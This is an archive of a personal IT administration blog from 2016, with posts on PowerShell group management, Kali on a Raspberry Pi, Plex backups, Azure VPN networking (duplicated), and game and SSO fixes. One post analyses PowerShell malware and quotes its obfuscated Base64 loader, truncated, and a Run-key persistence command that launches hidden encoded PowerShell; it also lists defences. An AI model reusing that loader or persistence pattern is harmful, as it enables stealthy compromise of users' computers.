Tuesday, December 13, 2016

Add Members to Distribution Group From CSV File

I had a hard time finding a simple way to add users to an existing DL from a CSV file. I stitched together a couple ways I found on the web. One uses an Exchange powershell command and the other uses an active directory powershell command


Import-CSV "File Name.csv" | ForEach {Add-DistributionGroupMember -Identity "Group Name" -Member $_.SamAccountName}


 Import-Csv "File Name.csv" | % {Add-ADGroupMember -Identity "Group Name" -  Member $_.SamAccountName}

In both cases you must have a CSV file with a header of SamAccountName and then the user accounts below that. For Example:


Also, if you use the Active Directory Command inside an Exchange Management Shell, be sure to import the AD module:

import-module activedirectory

You can put in another header if you like (UPN, SMTP Address, etc), but I've found SamAccountName works best for me.

Wednesday, November 30, 2016

Installing Kali Linux on a Raspberry Pi

I installed Kali Linux the other day on my RPi2. It was very easy but I had to go back and forth to figure out a few things so I thought I would put all my thoughts and steps in this post.

For those of you unfamiliar with Kali Linux, it's a Penetration Testing platform that runs Linux and can be installed on a variety of devices.

To download Kali Linux for the Raspberry Pi go here:


Scroll down until you see the image for your particular Raspberry Pi. I have a Rpi3 so i downloaded that image.

Once you've downloaded the image you will need to install the image on an SD card. The RPi 3 uses a micro SD card so what I've done is I bought a Micro SD card that has an adapter and then inserted that SD adapter into a USB adapter that will accept the SD card. I then plug it into my computer.

They have several ways to install the image (Windows, Linux, OS X, USB, etc). I will explain Windows and Linux.


To install the image using windows you must first extract the image from the archive file you downloaded. I use WinRAR but you can use whatever you are most comfortable with.

After you unzip the image you should format your SD card. I use SD Formatter which can be found HERE

You can accept the defaults and hit format. Be sure you are formatting the drive letter associated with your SD card:

After you've formatted the SD card you will now need to write the image to the SD card using Win32 Disk Imager. I usually download it from sourceforge. Wherever you download it from just make sure its a trusted site.

Once you've downloaded Win32 Disk Imager open it up and select the image you extracted earlier and be sure that under Device it shows the correct drive letter for your SD card.Once you have all of that in place press Write.

Be patient. It could a while for it to write the image. Mine took around 20 minutes. 

Once it's done writing the image, safely eject the SD card from your computer, put it in the RPi and power it on.

Once its done you should do a few more things which I will explain after the Linux tutorial


First you will need to install and extract the image. 

After you extract the image you will use the dd command to write the image to the SD card. In my case, I had a USB adapter that I put my SD card into and plugged it into my USB slot. 

Once your OS detects the SD card (either by USB, SD Card reader, etc) you must find out where it's mounted. The easiest way to do this is to run the command fdisk -l. This should list your SD card. Since I used a USB, mine was located at /dev/sdb. 

Yours may be different, especially if you are using an integrated SD card reader. Just be sure to know where its mounted otherwise you could wipe your hard drive(s) or another USB drive that connected to your computer.

Once you are certain that you have the correct info you want to run this command (make sure you are in the directory with your image file):

dd if=kali-2.1.2-rpi2.img of=/dev/sdb bs=512k

be sure to substitute the image name with the name of the image you downloaded as well as the device (in my case my SD card was located at /dev/sdb)

It could like a while for the image to write on the SD Card. Mine took about 20 minutes. 

Once the image is written, safely eject the SD card and put it in the RPi and power it on.


Once you have the image installed on an SD card (no matter which install you used) and the RPi is powered on and Kali is booted you should do a few things.

The first thing I do is run sudo apt-get update and then sudo apt-get upgrade. This will update Kali with any new updates. This step could take 30 minutes or more.

Once that's done you will want to expand the SD card to use all available space (by default it only creates a 6GB partition and doesnt expand).

I got the info from THIS site but I will post what I did below. You need to download the raspi-config and use the tool to expand the partition.

Run these commands:

sudo wget http://archive.raspberrypi.org/debian/pool/main/r/raspi-config/raspi-config_20160322_all.deb

sudo apt-get install gdebi

sudo gdebi raspi-config_201560322_all.deb

Once the package is downloaded and installed, run the raspi-config program to expand the partition:

sudo raspi-config

You will want to select the option to expand the file system (should be the first option) and then reboot. Some people are saying that it didn't work or that it messed up their partition. I tried it and it worked. 

The last thing you want to do once you are using all available space is to install all the Kali Tools (optional of course). To do this run the following command:

sudo apt-get install kali-linux-full

This will take a long time as I believe it downloads a few gigs worth of packages. You will also need to babysit it since at certain points it will ask for user input (ie, mySQL password, etc).

You also want to make sure you change you SSH keys since all the arm images use the same pre-configured keys:

rm /etc/ssh/ssh_host_*
dpkg-reconfigure openssh-server
service ssh restart

Sunday, November 27, 2016

Backing up Plex Media Server (PMS)

For those of you that have a Plex Server you know that a ton of data is held on the computer that hosts the server software. Thankfully, from what I have seen, you only need to backup two things:

  1. Registry Key
  2. Plex Media Server Folder

Excellent, but where are these located? 

The registry key is located at:

   HKCU\Software\Plex, Inc.\Plex Media Server

The Plex Media Server folder is located at:
  %localappdata%\Plex Media Server

I created a simple batch file to copy the registry key and folder to a NAS device on my home network. 

Here is the batch file:

@echo off

reg export "HKCU\Software\Plex, Inc.\Plex Media Server" p:\plex.reg /y

"c:\Program Files\WinRAR\rar.exe" a -r "d:\pms\pms-%date:/=-% %time::=-%.zip" "%localappdata%\Plex Media Server"

robocopy d:\pms\ p:\ /E /R:1 /W:1

del d:\pms\*.* /q
I export the registry key and then zip the Plex Media Server folder to my hard drive and then copy it to the NAS device. I then delete the file from my local hard drive.

A few things to keep in mind:

  1. The Plex Media Server folder can be pretty large. Mine was a little over 6GB.
  2. The updates folder inside the Plex Media Server Folder can be quite large. Mine had over 2GB of files and they are safe to delete. 
  3. Zipping the folder can take around 20-30 minutes. 

Once i created the batch file I created a Scheduled task to run every Sunday at midnight.

Saturday, November 5, 2016

Powershell Malware

I've been wanting to post about this subject for a while now but haven't had the chance. Hopefully I can give everyone some info on this subject.

First, what is Powershell Malware? Simply put, its powershell commands that go out and download powershell scripts that install keyloggers, takes screenshots, copies clipboard data and downloads more code.

From what I can tell, this is the life cycle of powershell malware:

  1. A user clicks a link or otherwise gets a piece of malware on their computer starts the process
  2. It creates a value called ComputerID under HKCU\Software\Microsoft\Windows\CurrentVersion.
  3. It will then create a value in HKCU\Software\Microsoft\Windows\CurrentVersion\Run
  4. Some of the malware will create scheduled tasks so that even if you delete those values the scheduled task will recreate them
  5. In domain environments it creates or adds to a GPO so that these values are sent to all the computers in the domain and also creating scheduled tasks.

Here is what it looks like (I removed the full Base64 string):

Invoke-Expression(New-Object IO.StreamReader((New-Object IO.Compression.DeflateStream([IO.MemoryStream][Convert]::FromBase64String('rV............

To figure out what they're doing, substitute "Write-Host" for the "Invoke-Expression" at the beginning and run it, and you get the following (again, I took out the Base64 code and replaced it with dots):

Set-ItemProperty -Force -Path HKLM:Software\Microsoft\Windows\CurrentVersion -Name ComputerID -Value  "......................."; Set-ItemProperty -Force -Path HKLM:Software\Microsoft\Windows\CurrentVersion\Run -Name Powersh
ellActiveDirectoryValue"`"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe`" -c `"`$x=`$((gp HKLM:Software\Microsoft\Windows\CurrentVersion ComputerID).ComputerID);powershell -Win Hidden -enc `$x`""

The above is the powershell malware creating the values with the commands in Base64.

At this point in time when it executes those commands it goes to a website to download the other scripts that will create key loggers, screen shots, copy clipboard data, etc. It would look something like this:


The port above is 9002 but it can be any port or just HTTPS.

The poweshell scripts it downloads seem to be from PowerSploit. I wont link here but you can Google it or find more info on Github. 

The worse part about this whole thing is that it will bypass all of your security measures. I mean, for the most part, who is blocking powershell commands? As Administrator we use them all the time on all of our systems. Since it's just downloading files most web filtering will let it through. 

So how do you stop it? A couple things but not much (as far as I know at this point and time)
  1. Use AppLocker to put Powershell in constrained language mode. 
  2. Enable Powershell logging and (if possible) centrally collect it
  3. Whitelist know scripts and dont let anything lese run powershell scripts. This can be done with AppLocker
  4. Block port that you don't need
If I find any more info I will post it.


I want to thank Tanner Kinkead, tanner.kinkead@gmail.com for helping me decipher the code and filling in the missing pieces for me as well as the suggestions above on how to help prevent it.

Sunday, October 30, 2016

Microsoft Azure - Networking

I've been getting my feet wet with Azure as we might be building a new infrastructure and services there.

We currently use VMWare so I am very familiar with creating VM's, networking them (even in different subnets, etc). I'm still getting used to the way Azure does networking, subnets and VPN's.

When creating a basic network inside Azure you need two things:

  1.  Address Space
  2.  Subnets

For those of us who have been building networks for years, this can sound extremely confusing. An address space is already part of a subnet. For example, if you have a network of, the /24 is your subnet. This gives you 256 IP's ( and the subnet mask would be So why do I need to create both? Shouldn't Azure just know what my address space is based on my subnets?

I can't speak for the Azure engineers but the only thing i can think of is they wanted organization and for it to be easy for people who have never created network before. 

You start by creating a new Virtual Network. When you create a new VNet, it will ask for your address space and a subnet.


Let's start with the address space. This will be represented using a CIDR range. For example, you can get crazy and put in This will give you a huge amount of IP's ( You can name the Address space something like Main Network

Creating the address space is only the first step. Without creating a subnet you can't do much (at least in Azure). The address space in Azure is just a place holder letting Azure know the network space you want to work with and give your VM's. 


Here is where you will break up your networks into logical chunks. Even though your address space is, your first subnet could be This will give you IP's from You can name the subnet something like Servers.

After you create this VNet, you can go back in an create more subnets where the VM's will live. You could create another subnet and name it Desktops. 

One thing to keep in mind is that even though they are on different subnets, because they are in the same address space in Azure, they can talk to each other without needing a gateway (I mean, there is a gateway but Azure handles all of that in the background).

The only exception to this is if you create another address space, lets say If you create this address space and then create subnets underneath that, you will need to create a VNet to VNet gateway if you want these to Address Space/Subnets to talk to each other. For this to work they must be in the same Azure location (IE, South Central US).

When you start creating new VM's you will be asked which Virtual Network you want to use and then which subnet you want to use.


VPN's are a little confusing inside Azure. I hope to be able to do a more in depth post on VPN's but for now I will briefly discuss how you set them up.

Azure has pretty much three type of VPN's Point to site, Point to Point and Express Route. Broken down they are:

Point to Site - Point to Site is basically a windows client connecting to the Azure network.

Point to Point - Point to Point is what I know as Site to Site. You will need a VPN device to connect to Azure. 

Express Route - Express route is a direct connection from your office directly to an Azure data center. Its like an MPLS. It doesn't go through the internet. Its a direct private link to your Azure environment.


To create a point to site you will need to go to your Virtual Network that you created, go to subnets and add a GatewaySubnet. I've been trying to find more info on why this is needed but I can't find a definitive answer. I'm assuming its a bridge between the Azure network and you. When you setup the GatewaySubnet, it will use a subnet from your available address space. Most articles say to give it a /28 or /27 CIDR to make sure you have enough IP's if you will be adding several VPN connections.

Once you create the GatewaySubnet, create a new Virtual Network Gateway. When creating this new VNet Gateway, make sure you select the correct VPN Type. Most people will use Route based (I had to use Policy based. I'll explain when i talk about Point to Point). 

Gateway Type will be VPN. Create a name, select your virtual network and Public IP (create a public IP if need be). Once you click create, it could take up to 45 minutes before its provisioned. 

Once the VNet Gateway is created, select it and select Point to Site Configuration. From here you will create an address pool and upload a root certificate. 

The address pool is the IP address the windows client will receive when connecting to the VPN. When creating and address pool make sure it doesn't conflict with anything on the Azure network side or your internal network side. I wont go into detail on how to create a root cert but you can do this using makecert.exe. I used the Windows 10 SDK to create both a root cert and a client cert. The root cert you have to export (without the private key) to a X509 certicate and upload the data (copy and paste from notepad) into the Public Certificate Data box inside the Point to Site configuration.

Once you have all of the info filled out you can save the configuration and then download the VPN client.


Point to Point requires more work because you need to make sure you configure your VPN device correctly. I used a watchguard firewall. But you can use Cisco, Juniper, etc. One thing to keep in mind is if you will be using Policy based or Routing based VPN. My watchguard only does policy based. 

When I created my VNet Gateway initially I choose Policy based. Make sure you choose correctly. If you don't you will need to delete and recreate your VNet Gateway since the Point to Point VPN attaches to a VNet Gateway and you can only have one VNet Gateway attached to your Virtual Network. If you have multiple Virtual Networks then I assume you can have different VPN types.

Once you've determined the correct VPN type, create a Virtual Network Gateway if you don't have one already. Once you do that, you will need to create a new Local Network Gateway. Give it a name, the public IP address of your VPN device, your local IP address scheme in CIDR format that you use in your office, Azure location and click create.

Once its created go inside the Local Network Gateway and select connections under settings. 

Click add, give it a name, attach it to a virtual network gateway and a Local Network Gateway. The next option is a pre shared key. Make this key long and something you will remember. My device only accepts letters and numbers. This key will be used in Azure and your VPN device. 

Connection type should already say Site-To-Site and be grayed out.

Once you create this connection, you will need to setup your VPN device in your office. The Public IP for your office device to connect to will be listed in the Local Gateway Network under the connection you just created.

HERE is a link that shows whats devices are supported and if they are Policy based, Route based or both.


I have not been able to create an express route since we have not gotten to that point yet but from what I see you will need a circuit id that will be provided by your current (MPLS) provider. You will need to create an new ExpressRoute Network Connection and fill out the info. Your MPLS provider should have the info.

EDIT 4-23-18: To create an Express route you need to add it from the networking area. Once you do you will need the service key listed and you will give that to your MPLS provider. Once they have this they will provision the circuit. Here is where it gets confusing. Microsoft calls the network connection Peering. They have three types:

1. Azure Private
2. Azure Public
3. Microsoft

Azure private is what it says. It creates a connection from your MPLS to Azure without the need for a VPN.

Azure Public lets you connect to Azure Public IP's through a private link.

Microsoft lets you connect directly to O365 (Exchange Online, Sahrepoint, Skype, etc) and Dynamics Apps without going through the internet.

A few things to note:

1. Azure Public is being phased out.
2. To use Microsoft Peering you need permission from Microsoft before your MPLS provider will provision this for you.
3. Make sure you tell your MPLS provider which of the three you want.

Once it's provisioned they will give you some VLAN, ASN and IP info. you enter that info and then create a virtual gateway and then add a connection from inside the provision circuit and point it to the virtual gateway. When I did this everything started working since my MPLS provider was sending BGP and it knew what IP's were my local network. Microsoft support also did some stuff on their end as I did have to call support for some help. 

Thats about it. If I get a chance I might put pictures and more details in another post. I'll put each connection type in it's own post.


This is from Microsoft's Azure site:

What is a policy-based (static-routing) gateway?

Policy-based gateways implement policy-based VPNs. Policy-based VPNs encrypt and direct packets through IPsec tunnels based on the combinations of address prefixes between your on-premises network and the Azure VNet. The policy (or Traffic Selector) is usually defined as an access list in the VPN configuration.

What is a route-based (dynamic-routing) gateway?

Route-based gateways implement the route-based VPNs. Route-based VPNs use "routes" in the IP forwarding or routing table to direct packets into their corresponding tunnel interfaces. The tunnel interfaces then encrypt or decrypt the packets in and out of the tunnels. The policy or traffic selector for route based VPNs are configured as any-to-any (or wild cards).

Microsoft Azure - Networking

I've been getting my feet wet with Azure as we might be building a new infrastructure and services there.

We currently use VMWare so I am very familiar with creating VM's, networking them (even in different subnets, etc). I'm still getting used to the way Azure does networking, subnets and VPN's.

When creating a basic network inside Azure you need two things:

  1.  Address Space
  2.  Subnets

For those of us who have been building networks for years, this can sound extremely confusing. An address space is already part of a subnet. For example, if you have a network of, the /24 is your subnet. This gives you 256 IP's ( and the subnet mask would be So why do I need to create both? Shouldn't Azure just know what my address space is based on my subnets?

I can't speak for the Azure engineers but the only thing i can think of is they wanted organization and for it to be easy for people who have never created network before. 

You start by creating a new Virtual Network. When you create a new VNet, it will ask for your address space and a subnet.


Let's start with the address space. This will be represented using a CIDR range. For example, you can get crazy and put in This will give you a huge amount of IP's ( You can name the Address space something like Main Network

Creating the address space is only the first step. Without creating a subnet you can't do much (at least in Azure). The address space in Azure is just a place holder letting Azure know the network space you want to work with and give your VM's. 


Here is where you will break up your networks into logical chunks. Even though your address space is, your first subnet could be This will give you IP's from You can name the subnet something like Servers.

After you create this VNet, you can go back in an create more subnets where the VM's will live. You could create another subnet and name it Desktops. 

One thing to keep in mind is that even though they are on different subnets, because they are in the same address space in Azure, they can talk to each other without needing a gateway (I mean, there is a gateway but Azure handles all of that in the background).

The only exception to this is if you create another address space, lets say If you create this address space and then create subnets underneath that, you will need to create a VNet to VNet gateway if you want these to Address Space/Subnets to talk to each other. For this to work they must be in the same Azure location (IE, South Central US).

When you start creating new VM's you will be asked which Virtual Network you want to use and then which subnet you want to use.


VPN's are a little confusing inside Azure. I hope to be able to do a more in depth post on VPN's but for now I will briefly discuss how you set them up.

Azure has pretty much three type of VPN's Point to site, Point to Point and Express Route. Borek down they are:

Point to Site - Point to Site is basically a windows client connecting to the Azure network.

Point to Point - Point to Point is what I know as Site to Site. You will need a VPN device to connect to Azure. 

Express Route - Express route is a direct connection from your office directly to an Azure data center. Its like an MPLS. It doesn't go through the internet. Its a direct private link to your Azure environment.


To create a point to site you will need to go to your Virtual Network that you created, go to subnets and add a GatewaySubnet. I've been trying to find more info on why this is needed but I can't find a definitive answer. I'm assuming its a bridge between the Azure network and you. When you setup the GatewaySubnet, it will use a subnet from your available address space. Most articles say to give it a /28 or /27 CIDR to make sure you have enough IP's if you will be adding several VPN connections.

Once you create the GatewaySubnet, create a new Virtual Network Gateway. When creating this new VNet Gateway, make sure you select the correct VPN Type. Most people will use Route based (I had to use Policy based. I'll explain when i talk about Point to Point). 

Gateway Type will be VPN. Create a name, select your virtual network and Public IP (create a public IP if need be). Once you click create, it could take up to 45 minutes before its provisioned. 

Once the VNet Gateway is created, select it and select Point to Site Configuration. From here you will create an address pool and upload a root certificate. 

The address pool is the IP address the windows client will receive when connecting to the VPN. When creating and address pool make sure it doesn't conflict with anything on the Azure network side or your internal network side. I wont go into detail on how to create a root cert but you can do this using makecert.exe. I used the Windows 10 SDK to create both a root cert and a client cert. The root cert you have to export (without the private key) to a X509 certicate and upload the data (copy and paste from notepad) into the Public Certificate Data box inside the Point to Site configuration.

Once you have all of the info filled out you can save the configuration and then download the VPN client.


Point to Point requires more work because you need to make sure you configure your VPN device correctly. I used a watchguard firewall. But you can use Cisco, Juniper, etc. One thing to keep in mind is if you will be using Policy based or Routing based VPN. My watchguard only does policy based. 

Policy based is using a static gateway and Routing based uses a Dynamic Gateway. 

When I created my VNet Gateway initially I choose Policy based. Make sure you choose correctly. If you don't you will need to delete and recreate your VNet Gateway since the Point to Point VPN attaches to a VNet Gateway and you can only have one VNet Gateway attached to your Virtual Network. If you have multiple Virtual Networks then I assume you can have different VPN types.

Once you've determined the correct VPN type, create a Virtual Network Gateway if you don't have one already. Once you do that, you will need to create a new Local Network Gateway. Give it a name, the public IP address of your VPN device, your local IP address scheme in CIDR format that you use in your office, Azure location and click create.

Once its created go inside the Local Network Gateway and select connections under settings. 

Click add, give it a name, attach it to a virtual network gateway and a Local Network Gateway. The next option is a pre shared key. Make this key long and something you will remember. My device only accepts letters and numbers. This key will be used in Azure and your VPN device. 

Connection type should already say Site-To-Site and be grayed out.

Once you create this connection, you will need to setup your VPN device in your office. The Public IP for your office device to connect to will be listed in the Local Gateway Network under the connection you just created.

HERE is a link that shows whats devices are supported and if they are Policy based, Route based or both.


I have not been able to create an express route since we have not gotten to that point yet but from what I see you will need a circuit id that will be provided by your current (MPLS) provider. You will need to create an new ExpressRoute Network Connection and fill out the info. Your MPLS provider should have the info.

Thats about it. If I get a chance I might put pictures and more details in another post. I'll put each connection type in it's own post.

Thursday, September 1, 2016

File locked on Snap Server

We use Overland Snap Servers for some of our network shares. Sometimes a file will get locked and even if we try to close it using windows management with the correct user name and password of the server, it will tell us access is denied.

What I have to do is SSH to the snap server, log in and run this command:

lsof|grep -i /path/to/filename

This will give you a PID of the file.

Once you have the PID you can kill it with this command:

kill -9 pid

If you get any errors while trying to do the commands, make sure you are root. To do this on the snap server log in via SSH as the user you would normally log in on the web GUI. then type:


su -

It will ask for a password. This will be the same password you used to log in.

Sunday, June 26, 2016

Minecraft - Spigot server Authentication Servers are down

My son has been begging me for a while to make him a Minecraft server. At the office we have a couple developers who have a couple servers in AWS that they may want me to take over. So I figured, this would be a good time to get familiar with AWS.

I setup AWS and created a micro ubuntu server and installed craftbukkit and spigot. Whenever we would logon, it would say the authentication servers were down when in fact they were up.

I found this on a post:

sudo /var/lib/dpkg/info/ca-certificates-java.postinst configure

Seems to be an issue with ubuntu. After running this command I no longer got the errors.

Thursday, May 12, 2016

Is Minecraft crashing on you (or your kids) when playing?

Normally I talk about servers and work related fixes but today I'm going a little off base and talking about a video game. The reason I am doing this is because even video games you have to troubleshoot at times.

My son is playing Minecraft and every so often it crashes with an error similar to this (I grabbed this from google images so its not the exact error, but close):

I looked high and low for a fix, updating video drivers and even moving to the new minecraft.exe launcher that supposedly doesn't need java. Nothing worked. 

The fix, as it turn out is to open the options.txt file and change fboEnable:true to fboEnable:false.

This little change seems to have fixed it. The way we found the fix was another kid saw his Minecraft crashing during a Minecraft league and helped us out.

Saturday, April 9, 2016

Windows 2012 R2 RDSH user desktop icons refresh (flicker) constantly

We have an usual issue where the desktop icons keep refreshing (flickering) when a user logs in to the RDSH server. This doesn't happen all the time but it happens enough were we had to find a way to stop it.

So far, the only way we'vegotten to stop this is to show hidden folders and files as well as system files. Once you do this, you will see a thumbs.db file on the desktop. If you delete this, the refresh (flickering) will stop. The file will sometimes reappear.

We are not sure why this happens but if I find out I will be sure to update this entry.

Wednesday, January 20, 2016

SSO error when using SalesForce

My users were getting the below error when trying to log in to Sales Force:

What happened was our token signing cert auto rolled and the old one became the secondary and the new one became the primary. Sales Force needs manual intervention to fix this by uploading a new Identity Provider cert.

Log on to your ADFS server (I use Windows 2012 R2) and open ADFS Management, go to certificates:

Next locate the Token Signing area and double click the PRIMARY Token signing certificate:

Choose the Details tab and then select Copy to file. Follow the prompts and then save it as a DER file.

Once you have the file copied to your computer, log in to to your Sales Force account and go to the Single Sign On Settings. You will want to edit your Single Sign On Settings and browse to the Token Signing cert you exported earlier in the Identity Provider Certificate area:

Once you do that, your users should now be able to log back on using SSO.

Error 1312 when adding ssl cert

 If you get an error when using netsh to add a cert thumbprint, make sure you have a private key attached to the cert. Also, make sure the c...